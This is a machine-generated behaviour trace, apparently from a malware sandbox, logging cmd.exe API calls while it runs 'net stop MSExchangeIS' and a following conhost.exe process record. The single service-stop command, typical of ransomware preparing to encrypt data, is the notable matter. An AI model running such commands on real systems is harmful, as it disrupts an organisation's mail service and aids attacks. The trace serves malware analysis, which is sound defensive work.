RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4a7edb8, lpData=0x4a7edc0, lpcbData=0x4a7edbc*=0x1000 | out: lpType=0x4a7edb8*=0x4, lpData=0x4a7edc0*=0x1, lpcbData=0x4a7edbc*=0x4) returned 0x0 [0136.934] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4a7edb8, lpData=0x4a7edc0, lpcbData=0x4a7edbc*=0x1000 | out: lpType=0x4a7edb8*=0x0, lpData=0x4a7edc0*=0x1, lpcbData=0x4a7edbc*=0x1000) returned 0x2 [0136.934] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4a7edb8, lpData=0x4a7edc0, lpcbData=0x4a7edbc*=0x1000 | out: lpType=0x4a7edb8*=0x4, lpData=0x4a7edc0*=0x0, lpcbData=0x4a7edbc*=0x4) returned 0x0 [0136.934] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4a7edb8, lpData=0x4a7edc0, lpcbData=0x4a7edbc*=0x1000 | out: lpType=0x4a7edb8*=0x4, lpData=0x4a7edc0*=0x40, lpcbData=0x4a7edbc*=0x4) returned 0x0 [0136.934] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4a7edb8, lpData=0x4a7edc0, lpcbData=0x4a7edbc*=0x1000 | out: lpType=0x4a7edb8*=0x4, lpData=0x4a7edc0*=0x40, lpcbData=0x4a7edbc*=0x4) returned 0x0 [0136.934] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4a7edb8, lpData=0x4a7edc0, lpcbData=0x4a7edbc*=0x1000 | out: lpType=0x4a7edb8*=0x0, lpData=0x4a7edc0*=0x40, lpcbData=0x4a7edbc*=0x1000) returned 0x2 [0136.934] RegCloseKey (hKey=0x94) returned 0x0 [0136.934] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4a7edb4 | out: phkResult=0x4a7edb4*=0x94) returned 0x0 [0136.934] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4a7edb8, lpData=0x4a7edc0, lpcbData=0x4a7edbc*=0x1000 | out: lpType=0x4a7edb8*=0x0, lpData=0x4a7edc0*=0x40, lpcbData=0x4a7edbc*=0x1000) returned 0x2 [0136.934] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4a7edb8, lpData=0x4a7edc0, lpcbData=0x4a7edbc*=0x1000 | out: lpType=0x4a7edb8*=0x4, lpData=0x4a7edc0*=0x1, lpcbData=0x4a7edbc*=0x4) returned 0x0 [0136.934] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4a7edb8, lpData=0x4a7edc0, lpcbData=0x4a7edbc*=0x1000 | out: lpType=0x4a7edb8*=0x0, lpData=0x4a7edc0*=0x1, lpcbData=0x4a7edbc*=0x1000) returned 0x2 [0136.934] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4a7edb8, lpData=0x4a7edc0, lpcbData=0x4a7edbc*=0x1000 | out: lpType=0x4a7edb8*=0x4, lpData=0x4a7edc0*=0x0, lpcbData=0x4a7edbc*=0x4) returned 0x0 [0136.934] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4a7edb8, lpData=0x4a7edc0, lpcbData=0x4a7edbc*=0x1000 | out: lpType=0x4a7edb8*=0x4, lpData=0x4a7edc0*=0x9, lpcbData=0x4a7edbc*=0x4) returned 0x0 [0136.934] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4a7edb8, lpData=0x4a7edc0, lpcbData=0x4a7edbc*=0x1000 | out: lpType=0x4a7edb8*=0x4, lpData=0x4a7edc0*=0x9, lpcbData=0x4a7edbc*=0x4) returned 0x0 [0136.934] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4a7edb8, lpData=0x4a7edc0, lpcbData=0x4a7edbc*=0x1000 | out: lpType=0x4a7edb8*=0x0, lpData=0x4a7edc0*=0x9, lpcbData=0x4a7edbc*=0x1000) returned 0x2 [0136.934] RegCloseKey (hKey=0x94) returned 0x0 [0136.934] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29839 [0136.934] srand (_Seed=0x5ad29839) [0136.934] GetCommandLineW () returned="/c net stop MSExchangeIS" [0136.934] GetCommandLineW () returned="/c net stop MSExchangeIS" [0136.934] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0136.935] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4c99cb8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0136.935] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0136.935] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0136.935] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.935] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0136.935] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0136.935] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0136.935] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0136.935] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0136.935] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0136.935] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0136.935] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0136.935] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0136.935] GetEnvironmentStringsW () returned 0x4c97d60* [0136.935] FreeEnvironmentStringsA (penv="A") returned 1 [0136.935] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.935] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.935] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0136.935] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0136.935] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0136.935] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0136.936] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0136.936] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0136.936] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0136.936] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0136.936] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a7fb8c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0136.936] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4a7fb8c, lpFilePart=0x4a7fb84 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4a7fb84*="Desktop") returned 0x1d [0136.936] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0136.936] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4a7f908 | out: lpFindFileData=0x4a7f908) returned 0x4c905c8 [0136.936] FindClose (in: hFindFile=0x4c905c8 | out: hFindFile=0x4c905c8) returned 1 [0136.936] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4a7f908 | out: lpFindFileData=0x4a7f908) returned 0x4c905c8 [0136.936] FindClose (in: hFindFile=0x4c905c8 | out: hFindFile=0x4c905c8) returned 1 [0136.936] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0136.936] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4a7f908 | out: lpFindFileData=0x4a7f908) returned 0x4c905c8 [0136.936] FindClose (in: hFindFile=0x4c905c8 | out: hFindFile=0x4c905c8) returned 1 [0136.936] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0136.936] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0136.936] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0136.936] GetEnvironmentStringsW () returned 0x4c97d60* [0136.937] FreeEnvironmentStringsA (penv="=") returned 1 [0136.937] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0136.937] GetConsoleOutputCP () returned 0x1b5 [0136.938] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0136.938] GetUserDefaultLCID () returned 0x409 [0136.938] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0136.938] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4a7fcbc, cchData=128 | out: lpLCData="0") returned 2 [0136.938] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4a7fcbc, cchData=128 | out: lpLCData="0") returned 2 [0136.938] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4a7fcbc, cchData=128 | out: lpLCData="1") returned 2 [0136.938] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0136.938] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0136.938] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0136.938] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0136.938] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0136.938] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0136.938] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0136.938] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0136.938] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0136.938] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0136.938] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0136.939] GetConsoleTitleW (in: lpConsoleTitle=0x4c9a9e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.939] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0136.939] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0136.939] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0136.939] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0136.940] _wcsicmp (_String1="net", _String2=")") returned 69 [0136.940] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0136.940] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0136.940] _wcsicmp (_String1="IF", _String2="net") returned -5 [0136.940] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0136.940] _wcsicmp (_String1="REM", _String2="net") returned 4 [0136.940] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0136.941] GetConsoleTitleW (in: lpConsoleTitle=0x4a7f9a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.941] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0136.941] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0136.941] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0136.941] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0136.941] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0136.941] _wcsicmp (_String1="net", _String2="CD") returned 11 [0136.941] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0136.941] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0136.941] _wcsicmp (_String1="net", _String2="REN") returned -4 [0136.941] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0136.941] _wcsicmp (_String1="net", _String2="SET") returned -5 [0136.941] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0136.941] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0136.941] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0136.941] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0136.941] _wcsicmp (_String1="net", _String2="MD") returned 1 [0136.941] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0136.941] _wcsicmp (_String1="net", _String2="RD") returned -4 [0136.941] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0136.941] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0136.941] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0136.941] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0136.941] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0136.941] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0136.941] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0136.941] _wcsicmp (_String1="net", _String2="VER") returned -8 [0136.941] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0136.941] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0136.941] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0136.941] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0136.941] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0136.941] _wcsicmp (_String1="net", _String2="START") returned -5 [0136.941] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0136.941] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0136.941] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0136.941] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0136.941] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0136.941] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0136.941] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0136.942] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0136.942] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0136.942] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0136.942] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0136.942] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0136.942] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0136.942] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0136.942] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0136.942] _wcsicmp (_String1="net", _String2="CD") returned 11 [0136.942] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0136.942] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0136.942] _wcsicmp (_String1="net", _String2="REN") returned -4 [0136.942] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0136.942] _wcsicmp (_String1="net", _String2="SET") returned -5 [0136.942] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0136.942] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0136.942] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0136.942] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0136.942] _wcsicmp (_String1="net", _String2="MD") returned 1 [0136.942] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0136.942] _wcsicmp (_String1="net", _String2="RD") returned -4 [0136.942] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0136.942] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0136.942] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0136.942] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0136.942] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0136.942] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0136.942] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0136.942] _wcsicmp (_String1="net", _String2="VER") returned -8 [0136.942] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0136.942] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0136.942] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0136.942] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0136.942] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0136.942] _wcsicmp (_String1="net", _String2="START") returned -5 [0136.942] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0136.942] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0136.942] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0136.942] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0136.942] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0136.942] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0136.942] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0136.942] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0136.942] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0136.942] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0136.942] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0136.942] _wcsicmp (_String1="net", _String2="IF") returned 5 [0136.942] _wcsicmp (_String1="net", _String2="REM") returned -4 [0136.943] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0136.943] SetErrorMode (uMode=0x0) returned 0x0 [0136.943] SetErrorMode (uMode=0x1) returned 0x0 [0136.943] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4c905d0, lpFilePart=0x4a7f4b4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4a7f4b4*="Desktop") returned 0x1d [0136.943] SetErrorMode (uMode=0x0) returned 0x1 [0136.943] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0136.943] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0136.950] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0136.950] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0136.950] GetConsoleTitleW (in: lpConsoleTitle=0x4a7f734, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.951] InitializeProcThreadAttributeList (in: lpAttributeList=0x4a7f660, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4a7f644 | out: lpAttributeList=0x4a7f660, lpSize=0x4a7f644) returned 1 [0136.951] UpdateProcThreadAttribute (in: lpAttributeList=0x4a7f660, dwFlags=0x0, Attribute=0x60001, lpValue=0x4a7f64c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4a7f660, lpPreviousValue=0x0) returned 1 [0136.951] GetStartupInfoW (in: lpStartupInfo=0x4a7f698 | out: lpStartupInfo=0x4a7f698*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0136.951] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0136.952] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0136.952] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0136.953] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSExchangeIS", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4a7f5e8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSExchangeIS", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4a7f634 | out: lpCommandLine="net stop MSExchangeIS", lpProcessInformation=0x4a7f634*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x524, dwThreadId=0xa78)) returned 1 [0136.959] CloseHandle (hObject=0xa4) returned 1 [0136.959] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0136.959] GetEnvironmentStringsW () returned 0x4c99ec8* [0136.959] FreeEnvironmentStringsA (penv="=") returned 1 [0136.959] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0137.079] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4a7f5cc | out: lpExitCode=0x4a7f5cc*=0x2) returned 1 [0137.079] CloseHandle (hObject=0xa8) returned 1 [0137.080] _vsnwprintf (in: _Buffer=0x4a7f6b4, _BufferCount=0x13, _Format="%08X", _ArgList=0x4a7f5d4 | out: _Buffer="00000002") returned 8 [0137.080] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0137.080] GetEnvironmentStringsW () returned 0x4c9b3a8* [0137.080] FreeEnvironmentStringsA (penv="=") returned 1 [0137.080] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0137.080] GetEnvironmentStringsW () returned 0x4c9b3a8* [0137.080] FreeEnvironmentStringsA (penv="=") returned 1 [0137.080] DeleteProcThreadAttributeList (in: lpAttributeList=0x4a7f660 | out: lpAttributeList=0x4a7f660) [0137.080] _get_osfhandle (_FileHandle=1) returned 0x3c [0137.080] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0137.080] _get_osfhandle (_FileHandle=1) returned 0x3c [0137.080] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0137.080] _get_osfhandle (_FileHandle=0) returned 0x38 [0137.080] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0137.081] SetConsoleInputExeNameW () returned 0x1 [0137.081] GetConsoleOutputCP () returned 0x1b5 [0137.081] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0137.081] SetThreadUILanguage (LangId=0x0) returned 0x409 [0137.081] exit (_Code=2) Thread: id = 645 os_tid = 0xa7c Process: id = "210" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x127de000" os_pid = "0xe18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "209" os_parent_pid = "0xe34" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" 